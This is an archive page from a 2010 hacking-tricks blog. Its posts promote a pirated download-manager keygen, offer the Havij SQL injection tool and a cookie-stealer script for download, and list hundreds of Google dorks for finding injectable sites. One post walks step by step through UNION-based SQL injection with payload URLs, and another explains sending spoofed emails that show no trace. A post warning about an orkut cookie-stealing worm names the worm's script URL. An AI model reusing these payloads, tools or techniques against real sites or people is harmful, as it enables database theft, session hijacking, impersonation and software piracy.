Home / Archives for September 2010

Download Internet download manager 6.02 beta with patch and keygen

Posted by Deepanker Verma Thursday, September 30, 2010 0 comments

Internet Download Manager v6.01 Build 6 Incl. Keygen and Patch-Lz0 | 9.22MB

Internet Download Manager (IDM) is a software to increase download speeds by up to 5 times, resume and schedule downloads.It also have resume capability of broken downloads by lost connection.
This is the best download manager available for windows. You must try it once

Download link:
http://hotfile.com/dl/66235866/0e8b684/IDM_601_kgen_patch_Lz0.zip.html

Advanced SQL Injection Tool - Havij

Posted by Deepanker Verma Wednesday, September 29, 2010 0 comments

SQL Injection is a dangerous web application vulnerability. Still, it exists in many websites. You can read introduction of SQL Injection here.

If you want to hack a website by using SQL injection vulnerability, you can either use manual methods or try some automatic tools. Havij is one of the popular automatic SQL injections tools.

This is a good hacking tool to hack a website by SQL injection. It automatically inject sql injection and return all the data from database of the website.. here is the screenshot.

You only need to enter the injection URL with query string. It will automatically injection injection strings and try to fetch database information. If the website is vulnerable, it fetches the whole database of the website.

Download Links:

http://www.ziddu.com/download/13171189/Havij_1.10.rar.html

bom sabado : orkut is attacked by a new worm

Posted by Deepanker Verma Tuesday, September 28, 2010 0 comments

Bom sabado which means GOOD SATURDAY.
It is a worm and now a days many of orkut users are getting affected by this new computer worm. These are the features of this worm-

1) A scrap which contains text as 'bom sabado' is sent from users without their knowledge.

2) Those who opens the scrap gets infected.Some account settings are automatically changed and some communities are added to the profile.

3)The worst thing is that the profile owner cannot unjoin from these communities.

This scrap also contains a javascript code and link is http://tptools.org/worm.js#%3Cwbr%3E#:1 please donot click on this.
This javascript code steals cookies from the user's browser. I think most of the peolpe know how important data it is... :p...........

This is the response of an google employee on this worm.. http://www.google.com/support/forum/p/orkut/thread?tid=4ef1add575e866b9&hl=en

If you also got this scrap from your friends-
1. Switch to older version then logout.
2. delete your cookies and other private data
3. Change your orkut password (Gmail Password) and security question.
4. Go to http://m.orkut.com and delete this scrap.

It's my advise not to use orkut for some days untill the problem is resolved by orkut team. And if you want to open orkut account then activate the 'promt' option to run any java script on your browser. But this is a risky solution so not to use orkut is better.

I wish this information is useful for you. If you like this post make sure to give your comments..

FIND VULNERABLE WEBSITES USING GOOGLE FOR SQL INJECTION

Posted by Deepanker Verma 1 comments

Use any of these search query in google to find the website vulnerable to SQL injection. Try to check vulnerability and get its detail by many SQL injection tricks.

inurl:index.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:games.php?id=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:category.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:shopping.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:declaration_more.php?decl_id=
inurl:games.php?id=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:shop_category.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:art.php?idm=
inurl:title.php?id=
inurl: info.php?id=
inurl :pro.php?id=

NOTE- This is not the end of list. Try to change page from php to asp. There may be many possible pages on the internet.

SQL Injection article

Posted by Deepanker Verma 1 comments

In one of my post about SQL Injection . I described how to y pass login form of a website. Now i am going to describe how to extract database details of a website using it's database error messages.

Find a page of a website like this: http://website/article.asp?ID=10
here parameter id=10 is the value which will use to extract data from database.
1. Now write this: http://website/article.asp?ID=10 and 1=0--
it will show article 10 if the number 1=0 . if it shows a database error, it means target is vulnerable.

2. Now find the total no. of columns by using order by
http://website/article.asp?ID=10 order by 1--
continue this order by step by using 1,2,3 ... and so on until you get a error message. Suppose you got the error message at value n, it means there are n-1 columns in the table.

3. Now use UNION command to extract data from the database.
http://website/article.asp?ID=-1 union select 1,2,3,4,5 from users--
here we guessed the table name users and no. 1 to 5 are according to the value of columns in the table we discovered . You can get the error message as invalid table name. Then try to guess another table name as USER, ADMIN, CUSTOMER and so on. or use any sql query to extract the list of table.

http://website/article.asp?ID=-1 1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES+WHERE
+table_name>'displayed_table'--
Display the name of the next table in the list after 'displayed_table.

using this query you can generate the list of table names of the database. Just think of error messages and use SQL to generate data.
:P

You need to have a good idea of how to extract database using SQL queries. By seeing database error messages, you can grab the data from the database.

Cookie stealer Script and xss

Posted by Deepanker Verma 0 comments

In one of my previous post i wrote about XSS in which attacker tries to inject some javascript code in to the website.
Mostly this attack is used for cookie stealing from an active session running in a website. If you do not know how to write this kind of script in Javascript. Here i am going to describe a script which is able to steal cookies in xss vulnerable web pages. You only need to upload this script as a php file in a php web hosts.

Download: http://www.ziddu.com/download/13227521/cookiestealer.zip.html

Trace sender of an EMAIL

Posted by Deepanker Verma Friday, September 24, 2010 0 comments

Many times you get fake emails and wanna know about the person who send you this email. It possible to find out origin of the EMAIL. The only thing you need to know is how to get email message header. Just copy the message header and paste it to the tracker system. And it will give you the location of the email sender's IP address.
tracee-mail

For more advance feature, you can try a tool name emailtracker pro which helps you to identify the true source of emails to help track suspects. This is tool is not a free product. You have to buy it from it's developer.
go to it's developer

But here is a promotional offer that gives you the full version license key of one of the older version of EMailTrackerPro free.
from rapidshare
Get EMailTrackerPro license key:
Go to this promotional page and enter you email address. Full version serial of EMailTrackerPro 2008 will be then sent to the submitted email. Download EMailTrackerPro and install the key provided.

after installing this software you can monitor your emails with the help of and easy gui interface..

XSS ( Cross site Scripting) : a common web application weakness

Posted by Deepanker Verma Thursday, September 16, 2010 0 comments

XSS stands for cross site scripting. It's really confusing why XSS for Cross Site Scripting. XSS is the preferred acronym for “Cross-Site-Scripting” simply to minimize the confusion with Cascading Style Sheets (CSS). XSS attack is when an attacker manages to inject Java script code or sometimes other code (usually Java Script) into a website causing it to execute the code for important feedback. This feedback may contain manythings but most important cookies. I assume you know what are the cookies and how important it is for a website login and sessions.

Hide your files in a jpeg image using cmd

Posted by Deepanker Verma Tuesday, September 14, 2010 0 comments

This is a simple command prompt ( cmd ) trick. You can hide your files behind jpeg image. You will only need winrar and a little knowledge of dos commands.
just follow these steps

How to Enable Registry Editor Disabled By virus

Posted by Deepanker Verma Sunday, September 12, 2010 0 comments

There are many viruses which disable registry editing of your windows. And when you try to edit registry you get a message that "Registry editor has been disabled by your administrator". This can be solved by taking these two simple steps.

Step1: Restart your computer in safe mode and open cmd and type following command

reg delete HKCU\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"

It will ask you for(Y/N)? typeY.

Step2.: Run this another command: run HKLM\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"

This will enable your registry editor

Send Fake emails from any emai id

Posted by Deepanker Verma Thursday, September 9, 2010 2 comments

Fake Emails: Term Fake email is used for those emails which claims to be from a sender but in actual they are not. Confuse???
Suppose you got an email from billgates@microsoft.com or stevejobs@apple.com

I think you will never believe on these emails. This kind of emails are called fake emails. This can be done with creating email packets with some script which adds information in the email headers manually. So we can send emails from any email id whether it exists or not.

There are some websites on the internet which allows you to send emails to any person. By using fake mail sender u can send emails to any email id by any email id (fake email id not necessary to exists). Suppose you know the email id of a person A. You want to send an email from the email id of person A. You can use these fake email sender website to do that. You can send email by any email id either it exists or not.

try this fake mail sender website : mail.anonymizer

This is not the only one. If you search on Google about the fake mail sender websites, you will many results. But some fake mail sender adds a line just after the email message. So at the receiver end, user will be able to see that the email is sent with the help of a fake mail sender. But the link i have given above will not add any kind of line in the email message. So you can use that fake email sender website.

If you know PHP, you can also create your own fake mail sender website just by using PHP sendmail function which works on most of the free web hosts too. :) In this case, you do not need to worry about the lines which fake mail sender websites append just after the message.

Use those fake mail sender and try to know what is the difference between fake email and actual email.
comment below in case you are facing any problem with these websites and scripts.

How to hide Ip address/ anonymous web surfing

Posted by Deepanker Verma Saturday, September 4, 2010 2 comments

Anonymous web surfing: If you browse the web in a way that no body or website can trace you back, then this type of web browsing is called anonymous web browsing. In anonymous web browsing, we browse the web by using the fake Ip address in place of the original Ip address we are using.
For all websites we are the visitors from the fake ip. So they will trace back to that fake ip address which never exits. Thus we achieve anonymous web browsing.

Download Platinum Hide IP address:-
Use Platinum Hide IP to keep your real IP address hidden, surf anonymously, secure all the protocols on your PC, provide full encryption of your activity while working in Internet, and much more.

Features :-

• Anonymize Your Web Surfing

• Protect Your Identity

• Choose IP Country and Check IP

• Send Anonymous Emails

• Get Unbanned from Forums and Blocked Websites

Download

http://sharingmatrix.com/file/10048015/Plat.Hid.IP.2.1.1.2.rar

http://hotfile.com/dl/51323784/2f32610/Plat.Hid.IP.2.1.1.2.rar.html

If these links do not work, then search in Google for the working links.

Lock your folders without any softwares

Posted by Deepanker Verma Friday, September 3, 2010 4 comments

This is a very simple batch file trick. Paste the given code in batch file and save it as with any name.(remember Batch file extension is .bat). Double click on this batch file to create a folder locker. Now you will see a folder name Locker at the same directory of batch file. Put all files which you want to hide in the Locker folder. Double click on this batch file to lock the folder 'Locker'. If you want to unlock your files,double click the batch file again and you would be prompted for password. Enter the password and enjoy access to the folder.

Hacking Tricks